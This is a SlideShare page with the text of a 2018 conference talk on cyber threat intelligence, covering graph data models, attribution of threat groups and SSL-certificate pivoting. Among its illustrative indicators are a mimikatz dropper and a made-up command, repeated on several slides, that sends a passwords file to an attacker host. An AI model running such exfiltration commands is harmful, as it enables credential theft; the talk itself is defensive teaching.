SlideShare a Scribd company logo

CONFidence 2018: Everything’s Connected aka Threat Intelligence 102 (Marcin Siedlarz)

PROIDEA
PROIDEA

Threat Intelligence is an elusive conception that attracted a lot of interest from the media since year 2013, when APT1 report was published by Mandiant. Being one of the most concise reports ever published, it is clear that the model used to analytically connect the dots was very robust and at the end of the day, impeccable. This methodology will be referenced in the talk. "Threat Intelligence 101" also builds upon 8 years of working with different incident response teams, tools and analytics they're using and cyber threat intelligence support they get. Following topic areas will be covered: - what threat intelligence is, and most importantly: what threat intelligence isn't - "everything connects to everything else" paradigm - application of graph database - analytic tradecraft and analytic confidence - how to track a threat actor with high analytic confidence The ultimate goal is to encourage the audience to launch their own cyber threat intelligence programs using data they most likely already have, provided that they're running a SOC or incident response practice. I will showcase how standalone CTI program allows to perform intelligence-driven incident response investigations, where IR data fuels intelligence and vice versa.

Technology
1 of 52
Download to read offline
Everything’s Connected aka Threat Intelligence 102 Marcin Siedlarz TORE Advanced Practices – Adversary Pursuit FireEye
About me, the preso and the motivation 2
©2018 FireEye | Private & Confidential About me § 9 years of experience of incident response and technical analysis of some of the most prolific and advanced cyber threats § CN/RU threat groups targeting PL gov § Contributing author to the Dragonfly research and whitepaper § Research of various APTs at FireEye 3
©2018 FireEye | Private & Confidential Leonardo da Vinci 4 Realize that everything connects to everything else.
©2018 FireEye | Private & Confidential 5
Intelligence objectives 6
©2018 FireEye | Private & Confidential Intelligence Objectives & Principles 7 Reduce uncertainty Knowledge that is: • Accurate • Timely • Relevant Knowledge about: • The threat • Surrounding environment • Visibility on threat actors, exploits, and malware • Tactical: TTPs, indicators, artifacts • Strategic: TTPs over time, industries targeted, data stolen, analysis of motivations and who benefits, attacker infrastructure • Attribution capability
©2018 FireEye | Private & Confidential Attribution capability 8 Incident1 IOC IOC Incident2 IOC IOC Incident3 IOC
©2018 FireEye | Private & Confidential Attribution capability 9 IOCs APTxTTPs TTPs
©2018 FireEye | Private & Confidential 10
Let’s track... The cars! 11
©2018 FireEye | Private & Confidential 12 car VIN color manufacturing date reg plate number reg date person first name surname birthdate
©2018 FireEye | Private & Confidential 13 car reg plate person carhasreg personhascar Queries: • All red cars manufactured in 2012 • All red cars belonging to male 21- 25 yrs old, sedan, registration plate starts with „W”
Cyber threat data model 14
©2018 FireEye | Private & Confidential Example nodes and edges (malware comms) 15 file fqdn file file ipv4srv url rundnslookup runconnect rungeturl
©2018 FireEye | Private & Confidential Example nodes and edges (hostops) 16 host file host host host hostcmd fsrefs latmove orghostcmd
©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 17 email file sentemail email emailto filefile subfilesubfile url filedocs
©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 18 email bhv/meth.phish.sender file bhv/meth.phish.msg sentemail email bhv/meth.phish.vic emailto file bhv/meth.phish .payload file bhv/meth.phish.body subfilesubfile url bhv/meth.phish .payload filedocs
©2018 FireEye | Private & Confidential Aspects -> Context aspect description bhv/meth.phish.sender An address that has been used to send a phishing message bhv/meth.phish.msg A phishing email message (or relevant headers) bhv/meth.phish.vic The recipient or intended target of phishing email bhv/meth.phish.payload Code attached or linked to the phishing email bhv/meth.phish.body The body of phishing email. Typically parsed out from rfc822 message 19
©2018 FireEye | Private & Confidential Aspects -> Context aspect description bhv/meth.phish.sender An address that has been used to send a phishing message bhv/meth.phish.msg A phishing email message (or relevant headers) bhv/meth.phish.vic The recipient or intended target of phishing email bhv/meth.phish.payload Code attached or linked to the phishing email bhv/meth.phish.body The body of phishing email. Typically parsed out from rfc822 message 20
©2018 FireEye | Private & Confidential Aspects -> Context aspect description bhv/meth.phish.sender An address that has been used to send a phishing message bhv/meth.phish.msg A phishing email message (or relevant headers) bhv/meth.phish.vic The recipient or intended target of phishing email bhv/meth.phish.payload Code attached or linked to the phishing email bhv/meth.phish.body The body of phishing email. Typically parsed out from rfc822 message 21
©2018 FireEye | Private & Confidential Aspects -> Context aspect description bhv/meth.phish.sender An address that has been used to send a phishing message bhv/meth.phish.msg A phishing email message (or relevant headers) bhv/meth.phish.vic The recipient or intended target of phishing email bhv/meth.phish.payload Code attached or linked to the phishing email bhv/meth.phish.body The body of phishing email. Typically parsed out from rfc822 message 22
©2018 FireEye | Private & Confidential Aspects -> Context aspect description bhv/meth.phish.sender An address that has been used to send a phishing message bhv/meth.phish.msg A phishing email message (or relevant headers) bhv/meth.phish.vic The recipient or intended target of phishing email bhv/meth.phish.payload Code attached or linked to the phishing email bhv/meth.phish.body The body of phishing email. Typically parsed out from rfc822 message 23
©2018 FireEye | Private & Confidential Aspects -> Context (bhv/meth) 24 bhv meth phish vic sender body payload fileops macro obf hostops wipe datamine
©2018 FireEye | Private & Confidential Aspects -> Context (bhv/capa) bhv/capa c2 twitter github crypt aes128 rc4 datamine keylog screen files 25
©2018 FireEye | Private & Confidential Aspects -> Context (sig) sig/ cve 2017 2018 exploit mal sogu zxshell 26
©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 27 email bhv/meth.phish.sender file bhv/meth.phish.msg sentemail email bhv/meth.phish.vic emailto file bhv/meth.phish .payload file bhv/meth.phish.body subfilesubfile url bhv/meth.phish .payload filedocs
©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 28 file bhv/meth.phish .payload file:basename = ”Payroll 2018.xls” bhv/meth.phish.payload +sig/mal.foobar +bhv/meth.fileops.macro file +sig/mal.foobar +bhv/meth.codelang.vbscript +bhv/role.macro url url=“https://foobarxyz.com/foo.exe +sig/mal.foobar
©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 29 url url=“https://foobarxyz.com/foo.exe +sig/mal.foobar file foo.exe fqdn foobarxyz.com email foobar@example.com ipv4addr 1.2.3.4 file:basename=foo.exe +sig/mal.foobar +code/foobar +bhv/role.backdoor +bhv/capa.comms.http +bhv/capa.cmd.exec
©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 30 file foo.exe url url=“https://c2domain.com/foo.php” +sig/mal.foobar fqdn fqdn=“c2domain.com +sig/mal.foobar host url file file:base=meow.exe +code/mimikatz
©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 31 host file file:base=meow.exe +code/mimikatz file file:base=passwords.txt +trend/exfil.creds.hash fs:rawpath=C:xyzpasswords.txt hostcmd ping evil.zy1.xyz foo.exe –send passwords.txt evil.zy1.xyz:8001 +bhv/meth.exfil +sig/mal.foobar
©2018 FireEye | Private & Confidential Attribution capability 32 IOCs APTxTTPs TTPs
©2018 FireEye | Private & Confidential +thr / +apt 33 § Most important aspect tree § Represents analytical assessment that a indicator is used by a threat group § Several considerations – Less rigid attribution framework == more attribution mistakes – Analytic confidence – Correlation value – Bias
©2018 FireEye | Private & Confidential 34 We should be handing out UNCs like candy
©2018 FireEye | Private & Confidential 35 apt/ apt1 apt2 aptx unc1 unc2
©2018 FireEye | Private & Confidential 36 apt/ apt1 apt2 aptx unc1 unc2
©2018 FireEye | Private & Confidential unc1 + unc2 37 node sig bhv apt foobarsender@yahoo. com meth.phish.sender unc1 Payroll 2018.xls mal.foobar meth.phish.payload unc1 foobarxyz.com mal.foobar unc1 foo.exe mal.foobar role.backdoor unc1 c2domain.com mal.foobar unc1 meow.exe rel.mimikatz unc1 foo.exe –send passwords.txt evil.zy1.xyz:8001 mal.foobar meth.exfil unc1
©2018 FireEye | Private & Confidential unc1 + unc2 38 node sig bhv apt random@mail.com meth.phish.sender Job offer.docx mal.foobar meth.phish.payload barfooabc.com mal.foobar abc.exe mal.foobar role.backdoor random.com mal.foobar mimi.exe rel.mimikatz
©2018 FireEye | Private & Confidential unc1 + unc2 39 node sig bhv apt random@mail.com meth.phish.sender unc2 Job offer.docx mal.foobar meth.phish.payload unc2 barfooabc.com mal.foobar unc2 abc.exe mal.foobar role.backdoor unc2 random.com mal.foobar unc2 mimi.exe rel.mimikatz unc2
©2018 FireEye | Private & Confidential unc1 + unc2 40 node sig bhv apt random@mail.com meth.phish.sender unc2 Job offer.docx mal.foobar meth.phish.payload unc2 barfooabc.com mal.foobar unc2 abc.exe mal.foobar role.backdoor unc2 random.com mal.foobar unc2 mimi.exe rel.mimikatz unc2 foo.exe –send passwords.txt evil.zy1.xyz:8001 mal.foobar meth.exfil
©2018 FireEye | Private & Confidential unc1 + unc2 41 node sig bhv apt random@mail.com meth.phish.sender unc2 Job offer.docx mal.foobar meth.phish.payload unc2 barfooabc.com mal.foobar unc2 abc.exe mal.foobar role.backdoor unc2 random.com mal.foobar unc2 mimi.exe rel.mimikatz unc2 foo.exe –send passwords.txt evil.zy1.xyz:8001 mal.foobar meth.exfil unc2
©2018 FireEye | Private & Confidential unc1 + unc2 42 Overlaps Trait Example Overlap conf.level Use of FOOBAR Low Use of same stagedir C:xyzpasswords.txt Medium Use of same exfil fqdn evil.zy1.xyz High
SOC Intelligence Support 43
©2018 FireEye | Private & Confidential ZXSHELL ssl certificates 44 SSL client HELLO sig 78.189.98.__ 122.252.228.__ 213.5.55.__ 80.69.180.__ 119.47.69.__ 14.55.203.__
©2018 FireEye | Private & Confidential ZXSHELL ssl certificates -----BEGIN CERTIFICATE----- MIIDBjCCAe4CCQDAg0xj8aawHTANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB VTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0 cyBQdHkgTHRkMB4XDTE2MDgxMDAyMzQxN1oXDTE3MDgxMDAyMzQxN1owRTELMAkG A1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUxITAfBgNVBAoTGEludGVybmV0 IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB AM+arV8LRA3mB6PHuo37Y00/qzKyNJiyBOrlbO9BTUwnbPyNCSCgorESHqg74m+2 Q2VK+YcBkWSFdwl2qZ3Gqzh4YRf6+KqVfdk8BtDDnoRy21D3ZJAEJFU3nRNgRFhM p+aysu7YTRnoM6YGut+7IKycwiU5SdtD+gEp7REthayg+wKIgbjI0sx7OaV0Rwzs D5ZYcrFb9V39VVprHMAeVbpsmu8n8Z6lIr7WWTPM13UZW5B2Qa7Dum+ylLk/Zp20 gooelLZjmWGGvqXAcxkxkMs0g+KBrpflGMBj1JtHS2p8qLGl2V/ZayaU5gVWABEr cMbYOO/ZvSAMIb2n2UDyuRcCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAf3rWXfyi C5OTpZYLeHBQL3hFyuK3HNBCwCSeKDutNzDoB4KHEHtSjqvp+kz/kcLU13sc8YFj HQrkdGZqyz8SNt1jna97opcSr94jDGZW/d8maZbKPN3tKt17yRovjBSkyIr1LtQ7 Nbo8EdGSsxBMnYxNqYUNqI94pg1Xr1WVmShhszO+BLl2JX1+2oMOV4GnvNDcaL9v LmuDDTzabLqWp280i1UBFbXuNid8DW7UOhhkn+YvQAoxxdqCSvHBgRXjqVNv2bcs 86E1NC8lbItLFK2/SvuyViuZA95A4RHParDtwuYGxSemp+mtt0qIck44G+MP+Jn0 rsKK05+u6n5/6g== -----END CERTIFICATE----- 45 78.189.98.__ 122.252.228.__ 213.5.55.__ 80.69.180.__ 119.47.69.__ 14.55.203.__ x509:serial=d9:be:00:43:b7:96:5c:48
©2018 FireEye | Private & Confidential ZXSHELL ssl certificates 46 49.206.128.35 x509:serial=d9:be:00:43:b7:96:5c:48 pdns: philippinenews.mooo.com second.photo-frame.com shoping.jumpingcrab.com
©2018 FireEye | Private & Confidential ZXSHELL ssl certificates 47 Source: https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/
©2018 FireEye | Private & Confidential ZXSHELL ssl certificates 48 80.69.180.__ 27.106.22.__ 14.35.248.__ 139.162.55.__
Launching your own CTI program 49
©2018 FireEye | Private & Confidential Key components of a TI program 50 4 DO’s § TI personnel: – Small team, even 1-2 analysts will do – RE capability in the TI or larger SOC team § Technology stack that allows pushing signatures – snort – yara § Pivoting and context creation § Next steps: – graph database, proprietary <-> open-source (https://github.com/vertexproject/synapse)
©2018 FireEye | Private & Confidential Key components of a TI program 51 1 Don’t § Newscaster ”threat intelligence” aka let’s buy a bunch of feeds, combine them together and brief C-level executives § Instead: – Focus on the data you already have (IR, SOC, external partnerships) – Get access to enrichment datasources (pdns, whois, ssl certificates) – Hunt for attackers activity – Tag and describe what you see – Pivot to find overlaps
Thank You marcin.siedlarz@fireeye.com @siedlmar(pl)

Recommended

pgp s mime
pgp s mimepgp s mime
pgp s mimeChirag Patel
 
Cryptography - RSA and ECDSA
Cryptography - RSA and ECDSACryptography - RSA and ECDSA
Cryptography - RSA and ECDSAAPNIC
 
SignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesSignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesDaniel Bohannon
 
Advanced Threat Hunting - BotConf 2017
Advanced Threat Hunting - BotConf 2017Advanced Threat Hunting - BotConf 2017
Advanced Threat Hunting - BotConf 2017ThreatConnect
 
Advanced Threat Hunting - Botconf 2017
Advanced Threat Hunting - Botconf 2017Advanced Threat Hunting - Botconf 2017
Advanced Threat Hunting - Botconf 2017Kevin Finley
 
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...NoNameCon
 
Cyber Threat 2019 NCSC-SANS London Conference - Mandiant Grab Bag of Attacker...
Cyber Threat 2019 NCSC-SANS London Conference - Mandiant Grab Bag of Attacker...Cyber Threat 2019 NCSC-SANS London Conference - Mandiant Grab Bag of Attacker...
Cyber Threat 2019 NCSC-SANS London Conference - Mandiant Grab Bag of Attacker...MitchellClarke14
 
Advanced Security on Kubernetes with Istio
Advanced Security on Kubernetes with IstioAdvanced Security on Kubernetes with Istio
Advanced Security on Kubernetes with IstioShunsuke Miyoshi
 

Recommended

pgp s mime
pgp s mimepgp s mime
pgp s mimeChirag Patel
 
Cryptography - RSA and ECDSA
Cryptography - RSA and ECDSACryptography - RSA and ECDSA
Cryptography - RSA and ECDSAAPNIC
 
SignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesSignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesDaniel Bohannon
 
Advanced Threat Hunting - BotConf 2017
Advanced Threat Hunting - BotConf 2017Advanced Threat Hunting - BotConf 2017
Advanced Threat Hunting - BotConf 2017ThreatConnect
 
Advanced Threat Hunting - Botconf 2017
Advanced Threat Hunting - Botconf 2017Advanced Threat Hunting - Botconf 2017
Advanced Threat Hunting - Botconf 2017Kevin Finley
 
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...NoNameCon
 
Cyber Threat 2019 NCSC-SANS London Conference - Mandiant Grab Bag of Attacker...
Cyber Threat 2019 NCSC-SANS London Conference - Mandiant Grab Bag of Attacker...Cyber Threat 2019 NCSC-SANS London Conference - Mandiant Grab Bag of Attacker...
Cyber Threat 2019 NCSC-SANS London Conference - Mandiant Grab Bag of Attacker...MitchellClarke14
 
Advanced Security on Kubernetes with Istio
Advanced Security on Kubernetes with IstioAdvanced Security on Kubernetes with Istio
Advanced Security on Kubernetes with IstioShunsuke Miyoshi
 
One Technique, Two Techniques, Red Technique, Blue Technique
One Technique, Two Techniques, Red Technique, Blue TechniqueOne Technique, Two Techniques, Red Technique, Blue Technique
One Technique, Two Techniques, Red Technique, Blue TechniqueDaniel Weiss
 
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis Phil Tully
 
Making the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data VisibilityMaking the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data Visibilitydianadvo
 
27.2.14 lab isolate compromised host using 5-tuple
27.2.14 lab isolate compromised host using 5-tuple27.2.14 lab isolate compromised host using 5-tuple
27.2.14 lab isolate compromised host using 5-tupleFreddy Buenaño
 
Threat Landscape Lessons from IoTs and Honeynets
Threat Landscape Lessons from IoTs and Honeynets Threat Landscape Lessons from IoTs and Honeynets
Threat Landscape Lessons from IoTs and Honeynets Digital Transformation EXPO Event Series
 
Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Travis
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...CODE BLUE
 
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365Douglas Bienstock
 
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansEvolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansChristopher Korban
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxsanap6
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxinstaeditz009
 
27.2.15 lab investigating a malware exploit
27.2.15 lab investigating a malware exploit27.2.15 lab investigating a malware exploit
27.2.15 lab investigating a malware exploitFreddy Buenaño
 
106 Threat defense and information security development trends
106 Threat defense and information security development trends106 Threat defense and information security development trends
106 Threat defense and information security development trendsSsendiSamuel
 
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...Ping Identity
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDefCamp
 
AWS Security Week: Lacework - Automating Cloud Security at Scale
AWS Security Week: Lacework - Automating Cloud Security at ScaleAWS Security Week: Lacework - Automating Cloud Security at Scale
AWS Security Week: Lacework - Automating Cloud Security at ScaleAmazon Web Services
 
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™Katie Nickels
 
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Rahul Sasi
 
Pgatss slide deck june 7, 2018
Pgatss slide deck june 7, 2018Pgatss slide deck june 7, 2018
Pgatss slide deck june 7, 2018Greg Wartes, MCP
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 

More Related Content

Similar to CONFidence 2018: Everything’s Connected aka Threat Intelligence 102 (Marcin Siedlarz)

One Technique, Two Techniques, Red Technique, Blue Technique
One Technique, Two Techniques, Red Technique, Blue TechniqueOne Technique, Two Techniques, Red Technique, Blue Technique
One Technique, Two Techniques, Red Technique, Blue TechniqueDaniel Weiss
 
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis Phil Tully
 
Making the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data VisibilityMaking the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data Visibilitydianadvo
 
27.2.14 lab isolate compromised host using 5-tuple
27.2.14 lab isolate compromised host using 5-tuple27.2.14 lab isolate compromised host using 5-tuple
27.2.14 lab isolate compromised host using 5-tupleFreddy Buenaño
 
Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Travis
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...CODE BLUE
 
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365Douglas Bienstock
 
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansEvolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansChristopher Korban
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxsanap6
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxinstaeditz009
 
27.2.15 lab investigating a malware exploit
27.2.15 lab investigating a malware exploit27.2.15 lab investigating a malware exploit
27.2.15 lab investigating a malware exploitFreddy Buenaño
 
106 Threat defense and information security development trends
106 Threat defense and information security development trends106 Threat defense and information security development trends
106 Threat defense and information security development trendsSsendiSamuel
 
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...Ping Identity
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDefCamp
 
AWS Security Week: Lacework - Automating Cloud Security at Scale
AWS Security Week: Lacework - Automating Cloud Security at ScaleAWS Security Week: Lacework - Automating Cloud Security at Scale
AWS Security Week: Lacework - Automating Cloud Security at ScaleAmazon Web Services
 
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™Katie Nickels
 
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Rahul Sasi
 
Pgatss slide deck june 7, 2018
Pgatss slide deck june 7, 2018Pgatss slide deck june 7, 2018
Pgatss slide deck june 7, 2018Greg Wartes, MCP
 

Similar to CONFidence 2018: Everything’s Connected aka Threat Intelligence 102 (Marcin Siedlarz) (20)

One Technique, Two Techniques, Red Technique, Blue Technique
One Technique, Two Techniques, Red Technique, Blue TechniqueOne Technique, Two Techniques, Red Technique, Blue Technique
One Technique, Two Techniques, Red Technique, Blue Technique
 
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis
StringSifter: Learning to Rank Strings Output for Speedier Malware Analysis
 
Making the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data VisibilityMaking the Case for Stronger Endpoint Data Visibility
Making the Case for Stronger Endpoint Data Visibility
 
27.2.14 lab isolate compromised host using 5-tuple
27.2.14 lab isolate compromised host using 5-tuple27.2.14 lab isolate compromised host using 5-tuple
27.2.14 lab isolate compromised host using 5-tuple
 
Threat Landscape Lessons from IoTs and Honeynets
Threat Landscape Lessons from IoTs and Honeynets Threat Landscape Lessons from IoTs and Honeynets
Threat Landscape Lessons from IoTs and Honeynets
 
Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
 
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365
Shmoocon 2019 - BECS and beyond: Investigating and Defending Office 365
 
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation PlansEvolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptx
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptx
 
27.2.15 lab investigating a malware exploit
27.2.15 lab investigating a malware exploit27.2.15 lab investigating a malware exploit
27.2.15 lab investigating a malware exploit
 
106 Threat defense and information security development trends
106 Threat defense and information security development trends106 Threat defense and information security development trends
106 Threat defense and information security development trends
 
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the Attacker
 
AWS Security Week: Lacework - Automating Cloud Security at Scale
AWS Security Week: Lacework - Automating Cloud Security at ScaleAWS Security Week: Lacework - Automating Cloud Security at Scale
AWS Security Week: Lacework - Automating Cloud Security at Scale
 
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
 
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
 
Pgatss slide deck june 7, 2018
Pgatss slide deck june 7, 2018Pgatss slide deck june 7, 2018
Pgatss slide deck june 7, 2018
 

Recently uploaded

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
